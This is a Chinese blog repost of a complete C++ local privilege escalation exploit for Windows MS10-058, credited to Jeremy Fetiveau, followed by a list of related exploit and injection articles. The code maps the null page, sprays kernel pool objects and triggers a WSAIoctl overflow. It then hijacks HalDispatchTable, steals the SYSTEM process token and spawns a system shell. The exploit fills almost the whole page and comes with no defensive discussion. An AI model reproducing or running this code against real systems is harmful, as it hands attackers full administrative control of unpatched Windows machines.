MS10-058 利用代码

最新推荐文章于 2024-08-20 09:19:31 发布
最新推荐文章于 2024-08-20 09:19:31 发布
阅读量473 收藏
点赞数
文章标签: 0day 
//链接:https://github.com/JeremyFetiveau/Exploits/blob/master/MS10-058.cpp



/*

Exploit for MS10-058

Jeremy Fetiveau

@__x86

Pool hit tag : 'oooo' 

*/

#include "stdafx.h"

using namespace std;

#define APC 0

#define IOCO 1

typedef struct {

    PVOID   Unknown1;

    PVOID   Unknown2;

    PVOID   Base;

    ULONG   Size;

    ULONG   Flags;

    USHORT  Index;

    USHORT  NameLength;

    USHORT  LoadCount;

    USHORT  PathLength;

    CHAR    ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

    ULONG   Count;

    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS (__stdcall *NtAllocateReserveObject_t) (OUT PHANDLE hObject, IN POBJECT_ATTRIBUTES ObjectAttributes, IN DWORD ObjectType);

typedef NTSTATUS (__stdcall *NtQueueApcThreadEx_t)(IN HANDLE hThread, IN HANDLE hApcReserve, IN PVOID ApcRoutine, IN PVOID ApcArgument1, IN PVOID ApcArgument2, IN PVOID ApcArgument3);

typedef NTSTATUS (__stdcall *NtSetIoCompletionEx_t)(IN HANDLE IoCompletionHandle, IN HANDLE hReserveObject, IN PVOID KeyContext, IN PVOID ApcContext, IN NTSTATUS IoStatus, ULONG_PTR IoStatusInformation);

typedef NTSTATUS (__stdcall *NtCreateIoCompletion_t)(OUT PHANDLE IoCompletionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN ULONG NumberOfConcurrentThreads); 

typedef NTSTATUS (__stdcall *NtAllocateVirtualMemory_t)(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN ULONG ZeroBits, IN OUT PULONG AllocationSize, IN ULONG AllocationType, IN ULONG Protect);

typedef NTSTATUS (__stdcall *NtQueryIntervalProfile_t)(UINT, PULONG);

NtAllocateReserveObject_t NtAllocateReserveObject;

NtQueueApcThreadEx_t NtQueueApcThreadEx;

NtSetIoCompletionEx_t NtSetIoCompletionEx;

NtCreateIoCompletion_t NtCreateIoCompletion;

NtAllocateVirtualMemory_t NtAllocateVirtualMemory;

NtQueryIntervalProfile_t NtQueryIntervalProfile;

typedef PVOID (__stdcall *PsGetCurrentProcess_t)(VOID);

typedef ULONG (__cdecl *DbgPrint_t)(PCHAR Format, ...); 

typedef LONG (__stdcall *RtlCompareString_t)(IN STRING *Str1, IN STRING str2, IN BOOLEAN caseInsensitive);

typedef PVOID (__stdcall *MmGetSystemRoutineAddress_t)(IN PUNICODE_STRING SystemRoutineName);

PsGetCurrentProcess_t PsGetCurrentProcess;

DbgPrint_t DbgPrint;

RtlCompareString_t RtlCompareString;

MmGetSystemRoutineAddress_t MmGetSystemRoutineAddress;

HANDLE hObject[10000];

HANDLE hObjectA[5000];

HANDLE hObjectB[5000];

PCHAR current;

PCHAR saved_token;

PUCHAR hal;

void InitPoolDescriptor(PVOID WriteAddress)

{

	INT i = 0;

	RtlZeroMemory((PCHAR)0x0, 0x1140+0x100); 

	*(PCHAR)0x0 = 1;

	*(PCHAR)0x4 = 1;

	*(PCHAR*)0x100 = (PCHAR)0x1208; 

	*(PCHAR*)0x104 = (PCHAR)0x20;

	for (i = 0x140; i < 0x1140; i += 8) {

		*(PCHAR*)i = (PCHAR)WriteAddress-4;

	}

	*(PINT)0x1200 = (INT)0x060c0a00;

	*(PINT)0x1204 = (INT)0x6f6f6f6f;

	*(PCHAR*)0x1208 = (PCHAR)0x0;

	*(PINT)0x1260 = (INT)0x060c0a0c;

	*(PINT)0x1264 = (INT)0x6f6f6f6f;

}

/* 

+0x0b8 ActiveProcessLinks

+0x16c ImageFileName

+0xf8  Token

*/

void payload()

{

	INT i;

	PCHAR process = (PCHAR)PsGetCurrentProcess();

	current = process;

	UCHAR sys[] = "System";

	BOOLEAN found;

	UNICODE_STRING haliStr;

	DbgPrint("%s %x\n", process+0x16c, process);

	DbgPrint("%x\n", (*(PUCHAR*)(hal+0xb*4)) + 0x1d4);

	*(PUCHAR*)hal = (*(PUCHAR*)(hal+0xb*4)) + 0x1d4;

	while (1) {

		DbgPrint("%x\n", process);

		found = true;

		for (i = 0; i <= 6; ++i) {

			if (sys[i] != process[0x16c+i]) {

				found = false;

				break;

			}

		}

		if (found) {

			DbgPrint("Be ready\n");

			saved_token = *(PCHAR*)(current+0xf8);

			*(PCHAR*)(current+0xf8) = *(PCHAR*)(process+0xf8);

			DbgPrint("Stole system token\n");

			break;

		}

		process = process + 0xb8;

		process = (*(PCHAR*)process) - 0xb8;

		if (process == current)

			break;

	}

}

void setupPayload() 

{

	*(PUCHAR)0x1208 = 0xb8;

	*(PINT)0x1209 = (INT)payload; 

	*(PUCHAR)0x120D = 0xff;

	*(PUCHAR)0x120E = 0xd0;

	*(PUCHAR)0x120F = 0xc9;

	*(PUCHAR)0x1210 = 0xc3;

}

void AllocNullPage() 

{

	HMODULE h;

	HANDLE hProc;

	PVOID addr;

	ULONG size;

	NTSTATUS st;

	size = 4096;

	addr = (PVOID)1;

	h = LoadLibraryA("ntdll.dll");

	if (!h) {

		printf("[-]Failed to load module\n");

		exit(1);

	}

	NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(h, "NtAllocateVirtualMemory");

	if (!NtAllocateVirtualMemory) {

		printf("[-]Failed to get the address of NtAllocateVirtualMemory %08x\n", GetLastError());

		exit(1);

	}

	hProc = GetCurrentProcess();

	if (!hProc) {

		printf("[-]Failed to get current process handle %08x\n", GetLastError());

		exit(1);

	}

	st = NtAllocateVirtualMemory(hProc, &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!NT_SUCCESS(st)) {

		printf("[-]Failed to allocate null page %08x\n", GetLastError());

		exit(1);

	}

}

int sprayIoCo()

{

	NTSTATUS st;

	HMODULE h;

	INT i = 0;

	h = LoadLibraryA("ntdll.dll");

	if (!h) {

		printf("[-]Failed to load module\n");

		exit(1);

	}

	NtAllocateReserveObject = (NtAllocateReserveObject_t)GetProcAddress(h, "NtAllocateReserveObject");

	NtSetIoCompletionEx = (NtSetIoCompletionEx_t)GetProcAddress(h, "NtSetIoCompletionEx");

	NtCreateIoCompletion = (NtCreateIoCompletion_t)GetProcAddress(h, "NtCreateIoCompletion");

	if (!NtAllocateReserveObject) {

		printf("[-]Failed to get the address of NtAllocateReserveObject %08x\n", GetLastError());

		exit(1);

	}

	if (!NtSetIoCompletionEx) {

		printf("[-]Failed to get the address of NtSetIoCompletionEx %08x\n", GetLastError());

		exit(1);

	}

	if (!NtCreateIoCompletion) {

		printf("[-]Failed to get the address of NtCreateIoCompletion %08x\n", GetLastError());

		exit(1);

	}

	printf("[+]Spraying np pool with IoCo reserve objects 1/2\n");

	for (i = 0; i < 10000; ++i) {

		st = NtAllocateReserveObject(&hObject[i], 0, IOCO);

		if (!NT_SUCCESS(st)) {

			printf("[-]Failed to allocate on the pool, %08x %08x\n", GetLastError(),st);

			exit(1);

		}

	}

	printf("[+]Spraying np pool with IoCo reserve objects 2/2\n");

	for (i = 0; i < 5000; ++i) {

		st = NtAllocateReserveObject(&hObjectA[i], 0, IOCO);

		if (!NT_SUCCESS(st)) {

			printf("[-]Failed to allocate on the pool, %08x %08x\n", GetLastError(),st);

			exit(1);

		}

		st = NtAllocateReserveObject(&hObjectB[i], 0, IOCO);

		if (!NT_SUCCESS(st)) {

			printf("[-]Failed to allocate on the pool, %08x %08x\n", GetLastError(),st);

			exit(1);

		}

		if (!CloseHandle(hObjectA[i])) {

			printf("[-]Failed to close reserve object handle\n");

			exit(1);

		}

	}

	printf("[+]Done spraying\n");

	return 0;

}

void freeIoCo() 

{

	INT i = 0;

	for (i = 0; i < 10000; ++i) {

		if (!CloseHandle(hObject[i])) {

				printf("[-]Failed to close reserve object handle (_)\n");

		}

	}

	for (i = 0; i < 5000; ++i) {

		if (!CloseHandle(hObjectB[i])) {

				printf("[-]Failed to close reserve object handle (B)\n");

		}

	}

}

PVOID getHalAndMisc() 

{

	HMODULE h, kernel;

	PUCHAR hal;

	PVOID kernelBase;

	ULONG len;

	NTSTATUS st;

	PSYSTEM_MODULE_INFORMATION sysInfo;

	PCHAR kernelImage;

	h = LoadLibraryA("ntdll.dll");

	if (!h) {

		printf("[-]Failed to load module\n");

		exit(1);

	}

	st = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)11, NULL, 0, &len);

	sysInfo = (PSYSTEM_MODULE_INFORMATION)malloc(len);

	if (!sysInfo) {

		printf("[-]Failed to allocate memory for system module information\n");

		exit(1);

	}

	st = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)11, sysInfo, len, &len);

	if (!NT_SUCCESS(st)) {

		printf("[-]Failed to get system module informations\n");

		exit(1);

	}

	kernelBase = sysInfo->Module[0].Base;

	kernelImage = strrchr((char*)(sysInfo->Module[0].ImageName), '\\') + 1;

	kernel = LoadLibraryA(kernelImage);

	if (!kernel) {

		printf("[-]Failed to load kernel base\n");

		exit(1);

	}

	hal = (PUCHAR)GetProcAddress(kernel, "HalDispatchTable");

	PsGetCurrentProcess = (PsGetCurrentProcess_t)GetProcAddress(kernel, "PsGetCurrentProcess");

	DbgPrint = (DbgPrint_t)GetProcAddress(kernel, "DbgPrint");

	RtlCompareString = (RtlCompareString_t)GetProcAddress(kernel, "RtlCompareString");

	MmGetSystemRoutineAddress = (MmGetSystemRoutineAddress_t)GetProcAddress(kernel, "MmGetSystemRoutineAddress");

	if (!hal) {

		printf("[-]Failed to find HalDispatchTable\n");

		exit(1);

	}

	if (!PsGetCurrentProcess) {

		printf("[-]Failed to find the address of PsGetCurrentProcess\n");

		exit(1);

	}

	if (!DbgPrint) {

		printf("[-]Failed to find the address of DbgPrint\n");

		exit(1);

	}

	if (!RtlCompareString) {

		printf("[-]Failed to find the address of RtlCompareString\n");

		exit(1);

	}

	if (!MmGetSystemRoutineAddress) {

		printf("[-]Failed to find the address of MmGetSystemRoutineAddress\n");

	}

	hal = (PUCHAR)hal - (PUCHAR)kernel + (PUCHAR)kernelBase;

	PsGetCurrentProcess = (PsGetCurrentProcess_t)((PUCHAR)PsGetCurrentProcess - (PUCHAR)kernel + (PUCHAR)kernelBase);

	DbgPrint = (DbgPrint_t)((PUCHAR)DbgPrint - (PUCHAR)kernel + (PUCHAR)kernelBase);

	RtlCompareString = (RtlCompareString_t)((PUCHAR)RtlCompareString - (PUCHAR)kernel + (PUCHAR)kernelBase);

	MmGetSystemRoutineAddress = (MmGetSystemRoutineAddress_t)((PUCHAR)MmGetSystemRoutineAddress - (PUCHAR)kernel + (PUCHAR)kernelBase);

	return (PVOID)((PUCHAR)hal + 4);

}

void callPayload()

{

	HMODULE h;

	ULONG foo;

	h = LoadLibraryA("ntdll.dll");

	if (!h) {

		printf("[-]Failed to load module\n");

		exit(1);

	}

	NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(h, "NtQueryIntervalProfile");

	if (!NtQueryIntervalProfile) {

		printf("[-]Failed to get the address of NtQueryIntervalProfile\n");

		exit(1);

	}

	NtQueryIntervalProfile(2, &foo);

}

void spawnShell()

{

    STARTUPINFOA si;

    PROCESS_INFORMATION pi;

    ZeroMemory( &si, sizeof(si) );

    si.cb = sizeof(si);

    ZeroMemory( &pi, sizeof(pi) );

	char str[] = "cmd";

    if( !CreateProcessA( NULL, 

        str,        

        NULL,        

        NULL,          

        TRUE,          

        CREATE_NEW_CONSOLE,              // No creation flags

        NULL,           // Use parent's environment block

        NULL,           // Use parent's starting directory 

        &si,            // Pointer to STARTUPINFO structure

        &pi )           // Pointer to PROCESS_INFORMATION structure

    ) 

    {

        printf("CreateProcess failed (%d).\n", GetLastError() );

        return;

    }

}

int main(void) 

{

	WSADATA wd = {0};

	SOCKET sock = 0;

	SOCKET_ADDRESS_LIST *pwn = (SOCKET_ADDRESS_LIST*)malloc(sizeof(INT) + 4 * sizeof(SOCKET_ADDRESS));

	DWORD cb;

	char buffer_name[30];

	DWORD len = 30;

	SOCKET_ADDRESS sa;

	CHAR buffer[0x1c];

	SOCKET_ADDRESS sa2;

	CHAR buffer2[0x1c] = "\x42\x42\x42\x42" "\x0c\x0a\x0c\x06" "\x6f\x6f\x6f\xef" "\x00\x00\x00\x00" "\x5c\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00\x00";

	int i = 0;

	memset(buffer,0x41,0x1c);

	buffer[0] = 0x17;

	buffer[1] = 0x00;

	sa.lpSockaddr = (LPSOCKADDR)buffer;

	sa.iSockaddrLength = 0x1c;

	sa2.lpSockaddr = (LPSOCKADDR)buffer2;

	sa2.iSockaddrLength = 0x1c;

	pwn->iAddressCount = 0x40000003;

	memcpy(&pwn->Address[0],&sa,sizeof(_SOCKET_ADDRESS));

	memcpy(&pwn->Address[1],&sa,sizeof(_SOCKET_ADDRESS));

	memcpy(&pwn->Address[2],&sa,sizeof(_SOCKET_ADDRESS));

	memcpy(&pwn->Address[3],&sa2,sizeof(_SOCKET_ADDRESS));

	AllocNullPage();

	printf("[+]Allocated null page\n");

	hal = (PUCHAR)getHalAndMisc();

	InitPoolDescriptor((PVOID)hal);

	printf("[+]Crafted fake pool descriptor\n");

	if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {

		printf("[-]Failed to set high priority to attacker thread (%08x)\n", WSAGetLastError());

		exit(1);

	}

	if (WSAStartup(MAKEWORD(2,0), &wd)) {

		printf("[-]Failed to initialize winsock (%08x)\n", WSAGetLastError());

		exit(1);

	}

	sock = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);

	if (sock == INVALID_SOCKET) {

		printf("[-]Failed to create socket (%08x)\n", WSAGetLastError());

		exit(1);

	}

	sprayIoCo();

	if (WSAIoctl(sock, SIO_ADDRESS_LIST_SORT, pwn, 0x1000, pwn, 0x1000, &cb, NULL, NULL)) {

		printf("[+]IoCo overflowed (%d)\n", WSAGetLastError());

		freeIoCo();

		printf("[+]Vulnerable chunk released\n");

	}

	else {

		printf("[-]Failed to trigger vulnerability\n");

	}

	printf("[+]Triggered vulnerability!\n");

	setupPayload();

	printf("[+]Set-up payload\n");

	printf("[+]Calling payload ... \n");

	callPayload();

	printf("[+]Spawning system shell ...\n");

	GetUserNameA(buffer_name, &len);

	printf("You are now : %s\n", buffer_name);

	spawnShell();

}

oceanark
关注
Kali WIndows 漏洞利用基础篇 (探索目标主机漏洞)
我不是猫叔
09-01 8724
通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞。因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体化在笔记本电脑上) 一.工具介绍 namp 一款可以探测主机的基本信息的扫描工具,数据包中包含扫描主机的开启端口,端口使用的服务,和一些系统信息。 msf一个极为强大的漏洞利用工具不管是系统漏洞...
APC机制
strongxu的专栏
01-28 3058
    APC(Asynchronous Procedure Call)异步过程调用。NtQueueApcThread()这个系统调用把一个”用户APC请求”挂入目标线程的APC队列。KTHREAD数据结构中APCState指向线程的APC队列(用户APC和内核APC。     一般来说,只有把APC请求挂入队列,就不再需要触发,而只是等待执行的时机。对于用户APC请求,该时机同样也是目标线程从
APC
SUNE__学无止境
12-19 285
0
NtQueueApcThreadEx NTDLL Gadget Injection 项目教程
最新发布
gitblog_00977的博客
08-20 279
NtQueueApcThreadEx NTDLL Gadget Injection 项目教程 ntqueueapcthreadex-ntdll-gadget-injectionThis novel way of using NtQueueApcThreadEx by abusing the ApcRoutine and SystemArgument[0-3] parameters by pass...
探索隐蔽代码注入:NtQueueApcThreadEx NTDLL Gadget Injection
gitblog_00027的博客
05-30 370
探索隐蔽代码注入:NtQueueApcThreadEx NTDLL Gadget Injection ntqueueapcthreadex-ntdll-gadget-injectionThis novel way of using NtQueueApcThreadEx by abusing the ApcRoutine and SystemArgument[0-3] parameters by ...
漫谈兼容内核之十二: Windows的APC机制(毛德操)
vbsourcecode的专栏
02-07 2385
前两篇漫谈中讲到,除ntdll.dll外,在启动一个新进程运行时,PE格式DLL映像的装入和动态连接是由ntdll.dll中的函数LdrInitializeThunk()作为APC函数执行而完成的。这就牵涉到了Windows的APC机制,APC是“异步过程调用(Asyncroneus Procedure Call)”的缩写。从大体上说,Windows的APC机制相当于Linux的Signal机制,
windows内核情景分析 --APC
maomao171314的专栏
04-04 2161
APC:异步过程调用。这是一种常见的技术。前面进程启动的初始过程就是:主线程在内核构造好运行环境后,从KiThreadStartup开始运行,然后调用PspUserThreadStartup,在该线程的apc队列中插入一个APC:LdrInitializeThunk,这样,当PspUserThreadStartup返回后,正式退回用户空间的总入口BaseProcessStartThunk前,会执行
MS14-058 CVE-2014-4113
10-21
在MS14-058的场景中,silic.png可能被用来触发或传递与CVE-2014-4113相关的漏洞利用,例如通过嵌入在图像元数据中的特殊指令来触发RTF文件的加载。 为了防范这种类型的攻击,用户应该保持Microsoft Office以及操作...
MS08-067 利用程序 含MS08-067-1.exe的完整代码
03-25
【标签】"MS08-067 利用程序 含MS08-067-1.exe的完整代码"进一步确认了压缩包内容的核心,即关于MS08-067漏洞的利用代码及其相关组件。 【压缩包子文件的文件名称列表】: - srvsvc_s.c 和 srvsvc_c.c:这两个文件...
ms14-068利用工具包.zip
07-01
MS14-068漏洞利用工具包通常包含攻击者用来探测和利用该漏洞的代码。此包中的两个MS14-068.exe文件可能是不同的版本或变体,用于尝试不同方法触发漏洞。这些工具通常由网络安全研究人员、渗透测试人员和恶意黑客使用...
MS17-010:MS17-010的自动入侵
04-23
MS17-010漏洞利用了SMBv1(SMB版本1)中的一个远程代码执行(RCE)漏洞,允许攻击者无需任何用户交互即可执行恶意代码。 修复MS17-010漏洞的方法主要是安装微软发布的补丁,如KB4012598。此外,禁用SMBv1也可以防止...
MS12-020漏洞python利用代码.docx
11-25
### MS12-020 漏洞 Python 利用代码详解 #### 一、背景介绍 MS12-020 是微软在 2012 年发布的一个安全公告,该公告披露了一个针对远程桌面协议 (RDP) 的严重安全漏洞。此漏洞允许攻击者通过特制的 RDP 请求向目标...
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
dll注入&代码注入
weixin_45880501的博客
09-17 1680
dll注入&代码注入 CreateRemoteThread 思路:在目标进程中申请一块内存并向其中写DLL路径,然后调用 CreateRemoteThread ,**(在自己进程中 创建远程线程到到目标进程)在目标进程中创建一个线程。**LoadLibrary()”函数作为线程的启动函数,来加载待注入的DLL文件 ,LoadLibrary()参数 就是存放DLL路径的内存指针. 这时需要目标进程的4个权限(PROCESS_CREATE_THREAD,PROCESS_QUERY_INFORMATION
win2008系统漏洞扫描所得的几个漏洞详解
weixin_46709219的博客
11-25 5030
https://blog.csdn.net/weixin_44756468/article/details/107701748 1)https://blog.csdn.net/weixin_43460822/article/details/96423613?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2allsobaiduend~default-1-96423613.nonecase&utm_term=nmap%20%E
漫谈兼容内核之十二:Windows的APC机制
周寅的专栏
03-13 3109
  前两篇漫谈中讲到,除ntdll.dll外,在启动一个新进程运行时,PE格式DLL映像的装入和动态连接是由ntdll.dll中的函数LdrInitializeThunk()作为APC函数执行而完成的。这就牵涉到了Windows的APC机制,APC是“异步过程调用(Asyncroneus Procedure Call)”的缩写。从大体上说,Windows的APC机制相当于Linux的Signal机
APC注入
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
10-30 653
/*********************************** desc : This code was written for inject a dll named text.dll to the target process based on APC. time : 2013 coder: ejoywx **********************
方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
热门推荐
captain51的博客
04-16 1万+
ETERNALBLUE :是一个0day RCE漏洞利用,影响最新的Windows 2008 R2 SERVER VIA SMB和NBT,利用SMB漏洞,攻击开放445端口的windows机器
防游戏检测之易语言APC注入DLL技术
hzw320的博客
08-18 1万+
本文章转载来自:http://bbs.dult.cn/thread-23291-1-1.html APC注入是什么原理? 首先我们得来了解下它是什么东西,才能更好的运用它,关于APC对于懂微软api函数使用的学员来说可能不陌生,新手估计没有接触过。 APC 注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的, 其具体流...
ms10-087漏洞利用的原理
04-04
MS10-087漏洞利用的原理是利用Windows操作系统中的Windows Graphics Rendering Engine (Win32k.sys)中的一个缺陷。攻击者可以通过构造恶意的TrueType字体文件,使得Windows操作系统在处理该字体文件时发生缓冲区溢出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值